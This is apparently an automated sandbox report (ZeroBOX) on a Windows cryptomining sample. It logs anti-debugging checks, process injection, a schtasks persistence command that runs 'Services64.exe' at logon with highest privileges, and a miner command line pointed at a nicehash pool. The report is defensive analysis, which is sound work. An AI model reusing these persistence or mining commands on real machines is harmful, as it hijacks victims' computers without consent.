popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

e.exe

Socket DNS AntiDebug PE64 BitCoin PE File AntiVM
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6402 June 12, 2021, 12:40 p.m. June 12, 2021, 12:43 p.m.
Size 2.0MB
Type PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
MD5 ab6993ce2614fdcdc6909b4a4d9d7be1
SHA256 618a4a59208309b790170e316ba06ae5e876fffd47854a4fdc2ff0bf7078631a
CRC32 9655D352
ssdeep 49152:UkMDQv4uTl28b+I8/6ZUMwBXTs7XJ+rNAvZ8l3RSwDB:U90AuQ8KI8/Bxs7orNARq
Yara
  • PE_Header_Zero - PE File Signature
  • IsPE64 - (no description)

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
172.217.25.14 Active Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: SUCCESS: The scheduled task "Services64" has successfully been created.
console_handle: 0x0000000000000007
1 1 0

WriteConsoleW

 buffer: SUCCESS: The scheduled task "Services64" has successfully been created.
console_handle: 0x0000000000000007
1 1 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 5620
region_size: 917504
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000a90000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 5620
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000af0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 5620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2461000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 5620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2afb000
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 5620
region_size: 589824
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002290000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 5620
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000022a0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 5620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2462000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 5620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2462000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 5620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2462000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 5620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2462000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 5620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2462000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 5620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2462000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 5620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2462000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 5620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2462000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 5620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2462000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 5620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2462000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 5620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2462000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 5620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2464000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 5620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2464000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 5620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2464000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 5620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2464000
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 5620
region_size: 655360
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff10000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 5620
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff10000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 5620
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff10000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 5620
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff20000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 5620
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff00000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 5620
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff00000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 5620
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe92cea000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 5620
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe92d9c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 5620
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe92dc6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 5620
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe92da0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 5620
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe92cfc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 5620
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe92e10000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 5620
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe92ceb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 5620
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe92d0b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 5620
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe92ce2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 5620
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe92d3c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 5620
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe92d0d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 5620
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe92cfa000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 5620
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe92e11000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 5620
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe92e50000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 4848
region_size: 786432
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000300000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 4848
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000340000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 4848
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2461000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 4848
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2afb000
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 4848
region_size: 2097152
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000021a0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 4848
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002320000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 4848
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2462000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 4848
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2462000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 4848
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2462000
process_handle: 0xffffffffffffffff
1 0 0
file C:\Users\test22\AppData\Roaming\Microsoft\inc\sihost32.exe
cmdline "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services64" /tr '"C:\Users\test22\AppData\Roaming\Services64.exe"' & exit
cmdline cmd /c schtasks /create /f /sc onlogon /rl highest /tn "Services64" /tr '"C:\Users\test22\AppData\Roaming\Services64.exe"' & exit
cmdline schtasks /create /f /sc onlogon /rl highest /tn "Services64" /tr '"C:\Users\test22\AppData\Roaming\Services64.exe"'
cmdline C:\Windows/System32\cmd.exe --cinit-find-e --pool=stratum://`3Mj3isU7efFTY3hwzMhneurp7bRYw5A23B`.ETH@daggerhashimoto.eu-north.nicehash.com:3353 --cinit-max-gpu=50 --response-timeout=30 --farm-retries=30 --cinit-idle-wait=7 --cinit-idle-gpu=90 --cinit-stealth --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6Nla3oEzlmSPLhkEvhuuKUoDAGYn1Jr2AI9cp4EWY+N7"
Time & API Arguments Status Return Repeated

ShellExecuteExW

 show_type: 0
filepath_r: cmd
parameters: /c schtasks /create /f /sc onlogon /rl highest /tn "Services64" /tr '"C:\Users\test22\AppData\Roaming\Services64.exe"' & exit
filepath: cmd
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: C:\Users\test22\AppData\Roaming\Microsoft\inc\sihost32.exe
parameters:
filepath: C:\Users\test22\AppData\Roaming\Microsoft\inc\sihost32.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: C:\Users\test22\AppData\Roaming\Services64.exe
parameters:
filepath: C:\Users\test22\AppData\Roaming\Services64.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: cmd
parameters: /c schtasks /create /f /sc onlogon /rl highest /tn "Services64" /tr '"C:\Users\test22\AppData\Roaming\Services64.exe"' & exit
filepath: cmd
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: C:\Users\test22\AppData\Roaming\Microsoft\inc\sihost32.exe
parameters:
filepath: C:\Users\test22\AppData\Roaming\Microsoft\inc\sihost32.exe
1 1 0
section {u'size_of_data': u'0x001ff200', u'virtual_address': u'0x00002000', u'entropy': 7.999815122425206, u'name': u'.text', u'virtual_size': u'0x001ff064'} entropy 7.99981512243 description A section with a high entropy has been found
entropy 0.99902272172 description Overall entropy of this PE file is high
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
url https://github.com/openwall/john/issues/3454
url http://www.gnu.org/licenses/
url http://www.jsonrpc.org/
description Communications use DNS rule Network_DNS
description Communications over RAW Socket rule Network_TCP_Socket
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
description Perform crypto currency mining rule BitCoin
Time & API Arguments Status Return Repeated

NtTerminateProcess

 status_code: 0xffffffff
process_identifier: 4848
process_handle: 0x000000000000024c
0 0

NtTerminateProcess

 status_code: 0xffffffff
process_identifier: 4848
process_handle: 0x000000000000024c
1 0 0
cmdline "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services64" /tr '"C:\Users\test22\AppData\Roaming\Services64.exe"' & exit
cmdline cmd /c schtasks /create /f /sc onlogon /rl highest /tn "Services64" /tr '"C:\Users\test22\AppData\Roaming\Services64.exe"' & exit
cmdline schtasks /create /f /sc onlogon /rl highest /tn "Services64" /tr '"C:\Users\test22\AppData\Roaming\Services64.exe"'
host 172.217.25.14
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 6316
region_size: 4603904
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000140000000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000000000000033c
1 0 0
cmdline "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services64" /tr '"C:\Users\test22\AppData\Roaming\Services64.exe"' & exit
cmdline cmd /c schtasks /create /f /sc onlogon /rl highest /tn "Services64" /tr '"C:\Users\test22\AppData\Roaming\Services64.exe"' & exit
cmdline schtasks /create /f /sc onlogon /rl highest /tn "Services64" /tr '"C:\Users\test22\AppData\Roaming\Services64.exe"'
file C:\Users\test22\AppData\Roaming\Microsoft\inc\sihost32.exe
Process injection Process 7112 manipulating memory of non-child process 6316
Time & API Arguments Status Return Repeated

NtUnmapViewOfSection

 base_address: 0x0000000140000000
region_size: 8786417680384
process_identifier: 6316
process_handle: 0x000000000000033c
-1073741799 0

NtAllocateVirtualMemory

 process_identifier: 6316
region_size: 4603904
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000140000000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000000000000033c
1 0 0
Process injection Process 7112 injected into non-child 6316
Time & API Arguments Status Return Repeated

WriteProcessMemory

 buffer: MZÿÿ¸@8º´ Í!¸LÍ!This program cannot be run in DOS mode. $zÎñF>¯Ÿ>¯Ÿ>¯ŸeǛq¯Ÿeǜ"¯Ÿeǚý¯Ÿ5À›-¯Ÿ5Àœ7¯Ÿ5Àš¢¯ŸeǞ2¯Ÿ‹ñ› ­ŸiQ?¯ŸiP.¯ŸøÀ›<¯Ÿ…Ξ=¯Ÿ>¯ž|®ŸøÀš1¯ŸøÀ–(¯ŸøÀŸ?¯ŸøÀ`?¯Ÿ>¯?¯ŸøÀ?¯ŸRich>¯ŸPEd† 6 `ð" +Ô ¡$@@FqÐE``(:ØV8:  E <T°E8ˆ`ú5°û5(€ú500+p.textH++ `.rdata$k0+l+@@.dataüx :ø†:@À.pdataT < ~;@@.nv_fatbH6@>8ž=@À.nvFatBi€EÖD@À_RDATA”EØD@@.rsrc EÚD@@.reloc8ˆ°EŠâD@B
base_address: 0x0000000140000000
process_identifier: 6316
process_handle: 0x000000000000033c
1 1 0

WriteProcessMemory

 buffer: ±CbF@>@
base_address: 0x0000000140458000
process_identifier: 6316
process_handle: 0x000000000000033c
1 1 0

WriteProcessMemory

 buffer: ‹&?‹&!‹&/‹&h‹&p‹&€‹&‹&(‹&À‹&Ћ&P‹&à‹&¨‹&ð‹&Œ&E‹&î&ë&&ç&ô&&&ä&&ø&0& &ð&&&à&8&
base_address: 0x0000000140459000
process_identifier: 6316
process_handle: 0x000000000000033c
1 1 0

WriteProcessMemory

 buffer: (€@€X€p€耈€ € ¸ È Ø¡Ehh¥E€¥E} IDI_ICON1(    ~YR~WP ~XQ ~YR~VO{H>a[Ha[[}TM~YR|NE‚nj_Y(€fa|€e`¯`Z?lh}SKw3'_X\U€e`did‚€fa½€d_¢^X`Zz?3~ZS~VO€c^Qhcy€f`q€d_Ÿ€faĀc^€~ZS \V~XPw3'a[9€e`p€b\_€aZo`Za[‚€d_¬a\XzA6~ZS~YR\U~YQ_YZ€`Zg€d^f`¶€d^ڀb\µ`Z€`Z{~[T(`Z}VN~WP·ÿÿ[T=€c]‡f`­gaµga¸€d^ހd^ç€d^ۀa[¨\UKj}UM}UN‚lg`Y5gagb¦ga±ga¹€d^ހd^ä€d_ހd_Í`ZKlh}UM~YR}VO€d^Tid|hcŠga¥€e_Ҁe`πfaǀc^ƒ~YR ~\UyC;€a[]W€famidvhc€€fa¹€faŀe_®_Y*b]z?7}UMt%€a[>hcwid€fa¸€faÂb\]s}VN\U~ZR €d_]ic€€fa»€d^“~[U]W|NF€e`_X$€ga{€e`¬`Z8€e`|LD~WP{J@€b\Nb\c}SL~XQ~[T~ZR~ZS~[Uþü?ü?øðàààààððøü?ü?þ h<?xml version='1.0' encoding='UTF-8' standalone='yes'?> <assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"> <security> <requestedPrivileges> <requestedExecutionLevel level='asInvoker' uiAccess='false' /> </requestedPrivileges> </security> </trustInfo> </assembly>
base_address: 0x000000014045a000
process_identifier: 6316
process_handle: 0x000000000000033c
1 1 0

WriteProcessMemory

 buffer: @
base_address: 0x000007fffffd4010
process_identifier: 6316
process_handle: 0x000000000000033c
1 1 0
Process injection Process 7112 injected into non-child 6316
Time & API Arguments Status Return Repeated

WriteProcessMemory

 buffer: MZÿÿ¸@8º´ Í!¸LÍ!This program cannot be run in DOS mode. $zÎñF>¯Ÿ>¯Ÿ>¯ŸeǛq¯Ÿeǜ"¯Ÿeǚý¯Ÿ5À›-¯Ÿ5Àœ7¯Ÿ5Àš¢¯ŸeǞ2¯Ÿ‹ñ› ­ŸiQ?¯ŸiP.¯ŸøÀ›<¯Ÿ…Ξ=¯Ÿ>¯ž|®ŸøÀš1¯ŸøÀ–(¯ŸøÀŸ?¯ŸøÀ`?¯Ÿ>¯?¯ŸøÀ?¯ŸRich>¯ŸPEd† 6 `ð" +Ô ¡$@@FqÐE``(:ØV8:  E <T°E8ˆ`ú5°û5(€ú500+p.textH++ `.rdata$k0+l+@@.dataüx :ø†:@À.pdataT < ~;@@.nv_fatbH6@>8ž=@À.nvFatBi€EÖD@À_RDATA”EØD@@.rsrc EÚD@@.reloc8ˆ°EŠâD@B
base_address: 0x0000000140000000
process_identifier: 6316
process_handle: 0x000000000000033c
1 1 0
Process injection Process 7112 called NtSetContextThread to modify thread in remote process 6316
Time & API Arguments Status Return Repeated

NtSetContextThread

 registers.r14: 0
registers.r15: 0
registers.rcx: 5371109792
registers.rsi: 0
registers.r10: 0
registers.rbx: 0
registers.rsp: 3275960
registers.r11: 0
registers.r8: 0
registers.r9: 0
registers.rip: 1998505216
registers.rdx: 8796092841984
registers.r12: 0
registers.rbp: 0
registers.rdi: 0
registers.rax: 0
registers.r13: 0
thread_handle: 0x0000000000000340
process_identifier: 6316
1 0 0
Process injection Process 7112 resumed a thread in remote process 6316
Time & API Arguments Status Return Repeated

NtResumeThread

 thread_handle: 0x0000000000000340
suspend_count: 1
process_identifier: 6316
1 0 0
Time & API Arguments Status Return Repeated

NtResumeThread

 thread_handle: 0x00000000000000c4
suspend_count: 1
process_identifier: 5620
1 0 0

NtResumeThread

 thread_handle: 0x0000000000000138
suspend_count: 1
process_identifier: 5620
1 0 0

NtResumeThread

 thread_handle: 0x0000000000000140
suspend_count: 1
process_identifier: 5620
1 0 0

NtResumeThread

 thread_handle: 0x0000000000000204
suspend_count: 1
process_identifier: 5620
1 0 0

NtGetContextThread

 thread_handle: 0x00000000000000c8
1 0 0

NtGetContextThread

 thread_handle: 0x00000000000000c8
1 0 0

NtResumeThread

 thread_handle: 0x00000000000000c8
suspend_count: 1
process_identifier: 5620
1 0 0

NtResumeThread

 thread_handle: 0x0000000000000238
suspend_count: 1
process_identifier: 5620
1 0 0

CreateProcessInternalW

 thread_identifier: 8752
thread_handle: 0x0000000000000398
process_identifier: 6012
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\cmd.exe
track: 1
command_line: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services64" /tr '"C:\Users\test22\AppData\Roaming\Services64.exe"' & exit
filepath_r: C:\Windows\System32\cmd.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x0000000000000390
1 1 0

NtResumeThread

 thread_handle: 0x0000000000000204
suspend_count: 1
process_identifier: 5620
1 0 0

CreateProcessInternalW

 thread_identifier: 668
thread_handle: 0x00000000000003e0
process_identifier: 4848
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Users\test22\AppData\Roaming\Microsoft\inc\sihost32.exe
track: 1
command_line: "C:\Users\test22\AppData\Roaming\Microsoft\inc\sihost32.exe"
filepath_r: C:\Users\test22\AppData\Roaming\Microsoft\inc\sihost32.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000000000003fc
1 1 0

NtResumeThread

 thread_handle: 0x00000000000003e4
suspend_count: 1
process_identifier: 5620
1 0 0

CreateProcessInternalW

 thread_identifier: 8264
thread_handle: 0x00000000000003ec
process_identifier: 7112
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Users\test22\AppData\Roaming\Services64.exe
track: 1
command_line: "C:\Users\test22\AppData\Roaming\Services64.exe"
filepath_r: C:\Users\test22\AppData\Roaming\Services64.exe
stack_pivoted: 0
